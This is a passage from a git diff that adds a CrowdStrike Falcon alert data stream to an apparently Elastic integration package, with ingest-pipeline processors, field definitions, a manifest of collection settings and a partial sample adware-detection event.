copy_from: crowdstrike.alert.process_start_time + ignore_empty_value: true + - rename: + field: json.product + tag: rename_product + target_field: crowdstrike.alert.product + ignore_missing: true + - rename: + field: json.quarantined_files + tag: rename_quarantined_files + target_field: crowdstrike.alert.quarantined_files + ignore_missing: true + - foreach: + field: crowdstrike.alert.quarantined_files + if: ctx.crowdstrike?.alert?.quarantined_files instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.sha256}}}' + allow_duplicates: false + - rename: + field: json.scenario + tag: rename_scenario + target_field: crowdstrike.alert.scenario + ignore_missing: true + - convert: + field: json.severity + tag: convert_severity_to_long + target_field: crowdstrike.alert.severity + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.severity + tag: set_event_severity_from_alert_severity + copy_from: crowdstrike.alert.severity + ignore_empty_value: true + - rename: + field: json.sha1 + tag: rename_sha1 + target_field: crowdstrike.alert.sha1 + ignore_missing: true + - rename: + field: json.sha256 + tag: rename_sha256 + target_field: crowdstrike.alert.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.sha1}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.sha1 != null + - append: + field: related.hash + value: '{{{crowdstrike.alert.sha256}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.sha256 != null + - convert: + field: json.show_in_ui + tag: convert_show_in_ui_to_boolean + target_field: crowdstrike.alert.show_in_ui + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.source_products + tag: rename_source_products + target_field: crowdstrike.alert.source_products + ignore_missing: true + - rename: + field: json.source_vendors + tag: rename_source_vendors + target_field: crowdstrike.alert.source_vendors + ignore_missing: true + - rename: + field: json.status + tag: rename_status + target_field: crowdstrike.alert.status + ignore_missing: true + - rename: + field: json.tactic + tag: rename_tactic + target_field: crowdstrike.alert.tactic + ignore_missing: true + - append: + field: threat.tactic.name + tag: append_threat_tactic_name + value: '{{{crowdstrike.alert.tactic}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.tactic != null + - rename: + field: json.tactic_id + tag: rename_tactic_id + target_field: crowdstrike.alert.tactic_id + ignore_missing: true + - script: + lang: painless + tag: script_to_set_threat_tactic_id + if: ctx.crowdstrike?.alert?.tactic_id != null + description: Script to set threat tactic ID. + source: | + def v = ctx.crowdstrike.alert.tactic_id; + if (v.startsWith("CS")) { + v = v.substring(2, v.length()); + } + ctx.threat.tactic.id = [v]; + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.technique + tag: rename_technique + target_field: crowdstrike.alert.technique + ignore_missing: true + - append: + field: threat.technique.name + tag: append_threat_technique_name + value: '{{{crowdstrike.alert.technique}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.technique != null + - rename: + field: json.technique_id + tag: rename_technique_id + target_field: crowdstrike.alert.technique_id + ignore_missing: true + - script: + lang: painless + tag: script_to_set_threat_technique_id + if: ctx.crowdstrike?.alert?.technique_id != null + description: Script to set threat technique ID. + source: | + def v = ctx.crowdstrike.alert.technique_id; + if (v.startsWith("CS")) { + v = v.substring(2, v.length()); + } + ctx.threat.technique.id = [v]; + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.timestamp + tag: date_timestamp + target_field: crowdstrike.alert.timestamp + formats: + - ISO8601 + if: ctx.json?.timestamp != null && ctx.json.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: '@timestamp' + tag: set_@timestamp_from_alert_timestamp + copy_from: crowdstrike.alert.timestamp + ignore_empty_value: true + - rename: + field: json.tree_id + tag: rename_tree_id + target_field: crowdstrike.alert.tree_id + ignore_missing: true + - rename: + field: json.tree_root + tag: rename_tree_root + target_field: crowdstrike.alert.tree_root + ignore_missing: true + - rename: + field: json.triggering_process_graph_id + tag: rename_triggering_process_graph_id + target_field: crowdstrike.alert.triggering_process_graph_id + ignore_missing: true + - rename: + field: json.type + tag: rename_type + target_field: crowdstrike.alert.type + ignore_missing: true + - date: + field: json.updated_timestamp + tag: date_updated_timestamp + target_field: crowdstrike.alert.updated_timestamp + formats: + - ISO8601 + if: ctx.json?.updated_timestamp != null && ctx.json.updated_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.user_id + tag: rename_user_id + target_field: crowdstrike.alert.user_id + ignore_missing: true + - set: + field: user.id + tag: set_user_id_from_alert_user_id + copy_from: crowdstrike.alert.user_id + ignore_empty_value: true + - rename: + field: json.user_name + tag: rename_user_name + target_field: crowdstrike.alert.user_name + ignore_missing: true + - set: + field: user.name + tag: set_user_name_from_alert_user_name + copy_from: crowdstrike.alert.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_user_id_into_related_user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{user.name}}}' + allow_duplicates: false + if: ctx.user?.name != null + - remove: + field: + - crowdstrike.alert.description + - crowdstrike.alert.device.external_ip + - crowdstrike.alert.device.hostinfo.domain + - crowdstrike.alert.device.hostname + - crowdstrike.alert.device.id + - crowdstrike.alert.device.mac_address + - crowdstrike.alert.device.os_version + - crowdstrike.alert.device.platform_name + - crowdstrike.alert.filename + - crowdstrike.alert.filepath + - crowdstrike.alert.id + - crowdstrike.alert.parent_details.cmdline + - crowdstrike.alert.parent_details.md5 + - crowdstrike.alert.parent_details.sha256 + - crowdstrike.alert.parent_details.user_id + - crowdstrike.alert.parent_details.user_name + - crowdstrike.alert.parent_process_id + - crowdstrike.alert.process_id + - crowdstrike.alert.severity + - crowdstrike.alert.timestamp + - crowdstrike.alert.user_id + - crowdstrike.alert.user_name + - crowdstrike.alert.process_start_time + - crowdstrike.alert.process_end_time + - crowdstrike.alert.tactic + - crowdstrike.alert.technique + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + description: Drops null/empty values recursively. + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/crowdstrike/data_stream/alert/fields/base-fields.yml b/packages/crowdstrike/data_stream/alert/fields/base-fields.yml new file mode 100644 index 00000000000..a93aca0ee91 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: event.module + type: constant_keyword + description: Event module. + value: crowdstrike +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: crowdstrike.alert +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/crowdstrike/data_stream/alert/fields/beats.yml b/packages/crowdstrike/data_stream/alert/fields/beats.yml new file mode 100644 index 00000000000..b3701b581cf --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/fields/beats.yml @@ -0,0 +1,9 @@ +- name: input.type + type: keyword + description: Type of filebeat input. +- name: log.offset + type: long + description: Log offset. +- name: tags + type: keyword + description: User defined tags. diff --git a/packages/crowdstrike/data_stream/alert/fields/fields.yml b/packages/crowdstrike/data_stream/alert/fields/fields.yml new file mode 100644 index 00000000000..52db7417203 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/fields/fields.yml @@ -0,0 +1,483 @@ +- name: crowdstrike.alert + type: group + fields: + - name: agent_id + type: keyword + description: Unique identifier for the CrowdStrike agent. + - name: aggregate_id + type: keyword + description: An aggregate identifier associated with the agent. + - name: alleged_filetype + type: keyword + description: The alleged file type of the detected file. + - name: cid + type: keyword + description: CrowdStrike identifier associated with the device. + - name: cloud_indicator + type: boolean + description: Indicates whether the activity is related to the cloud. + - name: cmdline + type: keyword + description: The command line used to execute the file. + - name: composite_id + type: keyword + description: A composite identifier associated with the device. + - name: confidence + type: long + description: Confidence level associated with the detection. + - name: context_timestamp + type: date + description: Timestamp when the alert was generated. + - name: control_graph_id + type: keyword + description: Identifier associated with the control graph. + - name: crawl_edge_ids + type: group + fields: + - name: Sensor + type: keyword + description: Edge identifiers associated with crawling. + - name: crawl_vertex_ids + type: group + fields: + - name: Sensor + type: keyword + description: Vertex identifiers associated with crawling. + - name: crawled_timestamp + type: date + description: Timestamp indicating when crawling occurred. + - name: created_timestamp + type: date + description: Timestamp indicating when the alert was created. + - name: data_domains + type: keyword + description: Data domains associated with the alert. + - name: description + type: keyword + description: Description of the detected file or activity. + - name: device + type: group + fields: + - name: agent_load_flags + type: long + description: Flags indicating the load status of the agent. + - name: agent_local_time + type: date + description: Local time of the agent. + - name: agent_version + type: keyword + description: Version of the CrowdStrike agent. + - name: bios_manufacturer + type: keyword + description: Manufacturer of the BIOS. + - name: bios_version + type: keyword + description: Version of the BIOS. + - name: cid + type: keyword + description: CrowdStrike identifier associated with the device. + - name: config_id_base + type: keyword + description: Base configuration identifier. + - name: config_id_build + type: keyword + description: Build configuration identifier. + - name: config_id_platform + type: long + description: Platform configuration identifier. + - name: external_ip + type: ip + description: External IP address of the device. + - name: first_seen + type: date + description: Timestamp indicating when the device was first seen. + - name: groups + type: keyword + description: Groups associated with the device. + - name: hostinfo + type: group + fields: + - name: active_directory_dn_display + type: keyword + description: Display name for Active Directory. + - name: domain + type: keyword + description: Domain of the device. + - name: hostname + type: keyword + description: Hostname of the device. + - name: id + type: keyword + description: Unique identifier for the device. + - name: last_seen + type: date + description: Timestamp indicating when the device was last seen. + - name: local_ip + type: ip + description: Local IP address of the device. + - name: mac_address + type: keyword + description: MAC address of the device. + - name: machine_domain + type: keyword + description: Domain of the machine. + - name: major_version + type: keyword + description: Major version of the device. + - name: minor_version + type: keyword + description: Minor version of the device. + - name: modified_timestamp + type: date + description: Timestamp indicating when the device was last modified. + - name: os_version + type: keyword + description: Operating system version. + - name: ou + type: keyword + description: Organizational unit information. + - name: platform_id + type: keyword + description: Platform identifier. + - name: platform_name + type: keyword + description: Name of the platform. + - name: pod_labels + type: keyword + description: Labels associated with the device. + - name: product_type + type: keyword + description: Type of product associated with the device. + - name: product_type_desc + type: keyword + description: Description of the product type. + - name: site_name + type: keyword + description: Name of the site associated with the device. + - name: status + type: keyword + description: Status of the device. + - name: system_manufacturer + type: keyword + description: System manufacturer of the device. + - name: system_product_name + type: keyword + description: System product name. + - name: falcon_host_link + type: keyword + description: Link to CrowdStrike Falcon host activity. + - name: filename + type: keyword + description: Name of the detected file. + - name: filepath + type: keyword + description: Path to the detected file. + - name: grandparent_details + type: group + fields: + - name: cmdline + type: keyword + description: Command line of the grandparent process. + - name: filename + type: keyword + description: Filename of the grandparent process. + - name: filepath + type: keyword + description: Filepath of the grandparent process. + - name: local_process_id + type: keyword + description: Local process ID of the grandparent process. + - name: md5 + type: keyword + description: grandparent_details.md5 MD5 hash of the grandparent process. + - name: process_graph_id + type: keyword + description: Graph ID of the grandparent process. + - name: process_id + type: keyword + description: Process ID of the grandparent process. + - name: sha256 + type: keyword + description: grandparent_details.sha256 SHA256 hash of the grandparent process. + - name: timestamp + type: date + description: Timestamp of the grandparent process. + - name: user_graph_id + type: keyword + description: Graph ID of the grandparent process user. + - name: user_id + type: keyword + description: User ID of the grandparent process. + - name: user_name + type: keyword + description: Username of the grandparent process. + - name: has_script_or_module_ioc + type: boolean + description: Indicates if there is a script or module IOC (Indicator of Compromise). + - name: id + type: keyword + description: Identifier associated with the alert. + - name: indicator_id + type: keyword + description: Identifier of the detected indicator. + - name: ioc_context + type: group + fields: + - name: cmdline + type: keyword + description: Command Line of the IOC context. + - name: ioc_description + type: keyword + description: Description of the IOC context. + - name: ioc_source + type: keyword + description: Source of the IOC. + - name: ioc_type + type: keyword + description: Type of IOC. + - name: ioc_value + type: keyword + description: Value of the IOC. + - name: md5 + type: keyword + description: ioc_context.md5 MD5 hash associated with the IOC. + - name: sha256 + type: keyword + description: ioc_context.sha256 SHA256 hash associated with the IOC. + - name: type + type: keyword + description: Type of IOC context. + - name: ioc_values + type: keyword + description: Values associated with the IOC. + - name: is_synthetic_quarantine_disposition + type: boolean + description: Indicates if the quarantine disposition is synthetic. + - name: local_process_id + type: keyword + description: Local process ID associated with the alert. + - name: logon_domain + type: keyword + description: Domain associated with the logon. + - name: md5 + type: keyword + description: md5 MD5 hash associated with the detected file. + - name: name + type: keyword + description: Name of the detection. + - name: objective + type: keyword + description: Objective of the detection. + - name: parent_details + type: group + fields: + - name: cmdline + type: keyword + description: Command line of the parent process. + - name: filename + type: keyword + description: Filename of the parent process. + - name: filepath + type: keyword + description: Filepath of the parent process. + - name: local_process_id + type: keyword + description: Local process ID of the parent process. + - name: md5 + type: keyword + description: parent_details.md5 MD5 hash of the parent process. + - name: process_graph_id + type: keyword + description: Graph ID of the parent process. + - name: process_id + type: keyword + description: Process ID of the parent process. + - name: sha256 + type: keyword + description: parent_details.sha256 SHA256 hash of the parent process. + - name: timestamp + type: date + description: Timestamp of the parent process. + - name: user_graph_id + type: keyword + description: Graph ID of the parent process user. + - name: user_id + type: keyword + description: User ID of the parent process. + - name: user_name + type: keyword + description: Username of the parent process. + - name: parent_process_id + type: keyword + description: Process ID of the parent process. + - name: pattern_disposition + type: long + description: Disposition of the pattern. + - name: pattern_disposition_description + type: keyword + description: Description of the pattern disposition. + - name: pattern_disposition_details + type: group + fields: + - name: blocking_unsupported_or_disabled + type: boolean + description: Indicates if blocking is unsupported or disabled. + - name: bootup_safeguard_enabled + type: boolean + description: Indicates if the bootup safeguard is enabled. + - name: critical_process_disabled + type: boolean + description: Indicates if the critical process is disabled. + - name: detect + type: boolean + description: Indicates if the pattern detected the threat. + - name: fs_operation_blocked + type: boolean + description: Indicates if file system operation is blocked. + - name: handle_operation_downgraded + type: boolean + description: Indicates if handle operation is downgraded. + - name: inddet_mask + type: boolean + description: Indicates if the indicator detection mask is true. + - name: indicator + type: boolean + description: Indicates if the pattern detected an indicator. + - name: kill_action_failed + type: boolean + description: Indicates if the kill action failed. + - name: kill_parent + type: boolean + description: Indicates if the parent process was killed. + - name: kill_process + type: boolean + description: Indicates if the process was killed. + - name: kill_subprocess + type: boolean + description: Indicates if the subprocess was killed. + - name: operation_blocked + type: boolean + description: Indicates if the operation is blocked. + - name: policy_disabled + type: boolean + description: Indicates if the policy is disabled. + - name: process_blocked + type: boolean + description: Indicates if the process is blocked. + - name: quarantine_file + type: boolean + description: Indicates if the file is quarantined. + - name: quarantine_machine + type: boolean + description: Indicates if the machine is quarantined. + - name: registry_operation_blocked + type: boolean + description: Indicates if registry operation is blocked. + - name: rooting + type: boolean + description: Indicates if rooting is detected. + - name: sensor_only + type: boolean + description: Indicates if the detection is based on the sensor only. + - name: suspend_parent + type: boolean + description: Indicates if the parent process was suspended. + - name: suspend_process + type: boolean + description: Indicates if the process was suspended. + - name: pattern_id + type: keyword + description: Identifier associated with the pattern. + - name: platform + type: keyword + description: Platform associated with the alert. + - name: poly_id + type: keyword + description: Identifier associated with polymorphic behavior. + - name: process_end_time + type: date + description: Timestamp indicating when the process ended. + - name: process_id + type: keyword + description: Identifier associated with the process. + - name: process_start_time + type: date + description: Timestamp indicating when the process started. + - name: product + type: keyword + description: Product associated with the detection. + - name: quarantined_files + type: group + fields: + - name: filename + type: keyword + description: Filename of quarantined files. + - name: id + type: keyword + description: Identifier of quarantined files. + - name: sha256 + type: keyword + description: quarantined_files.sha256 SHA256 hash of quarantined files. + - name: state + type: keyword + description: State of quarantined files. + - name: scenario + type: keyword + description: Scenario associated with the detection. + - name: severity + type: long + description: Severity level associated with the detection. + - name: sha1 + type: keyword + description: sha1 SHA1 hash associated with the detected file. + - name: sha256 + type: keyword + description: sha256 SHA256 hash associated with the detected file. + - name: show_in_ui + type: boolean + description: Indicates if the alert should be displayed in the user interface. + - name: source_products + type: keyword + description: Products associated with the data source. + - name: source_vendors + type: keyword + description: Vendors associated with the data source. + - name: status + type: keyword + description: Status of the alert. + - name: tactic + type: keyword + description: Tactic associated with the detection. + - name: tactic_id + type: keyword + description: Identifier associated with the tactic. + - name: technique + type: keyword + description: Technique associated with the detection. + - name: technique_id + type: keyword + description: Identifier associated with the technique. + - name: timestamp + type: date + description: Timestamp associated with the alert. + - name: tree_id + type: keyword + description: Identifier associated with the tree. + - name: tree_root + type: keyword + description: Root identifier associated with the tree. + - name: triggering_process_graph_id + type: keyword + description: Graph ID of the triggering process. + - name: type + type: keyword + description: Type associated with the alert. + - name: updated_timestamp + type: date + description: Timestamp indicating when the alert was last updated. + - name: user_id + type: keyword + description: User ID associated with the alert. + - name: user_name + type: keyword + description: Username associated with the alert. diff --git a/packages/crowdstrike/data_stream/alert/manifest.yml b/packages/crowdstrike/data_stream/alert/manifest.yml new file mode 100644 index 00000000000..1d6866d48b5 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/manifest.yml @@ -0,0 +1,81 @@ +title: Collect Alert logs from CrowdStrike. +type: logs +streams: + - input: cel + title: Falcon Alerts + description: Collect Unified Alerts from CrowdStrike Falcon Intelligence. + enabled: false + template_path: cel.yml.hbs + vars: + - name: initial_interval + type: text + title: Initial Interval + description: How far back to pull the Alert logs from CrowdStrike. Supported units for this parameter are h/m/s. + multi: false + required: true + show_user: true + default: 24h + - name: interval + type: text + title: Interval + description: Duration between requests to the CrowdStrike API. Supported units for this parameter are h/m/s. + default: 5m + multi: false + required: true + show_user: true + - name: batch_size + type: integer + title: Batch Size + description: Batch size for the response of the CrowdStrike API. It must be between 1 - 10000. + default: 10000 + multi: false + required: true + show_user: false + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: true + show_user: false + default: 30s + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - crowdstrike-alert + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve crowdstrike.alert fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/crowdstrike/data_stream/alert/sample_event.json b/packages/crowdstrike/data_stream/alert/sample_event.json new file mode 100644 index 00000000000..cb482cacc6a --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/sample_event.json @@ -0,0 +1,336 @@ +{ + "@timestamp": "2023-11-03T18:00:22.328Z", + "agent": { + "ephemeral_id": "532c45c9-f01e-40e0-9406-8997b9a2b29c", + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + "WinComputers" + ], + "platform_id": "0", + "platform_name": "Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + "system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + "ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + 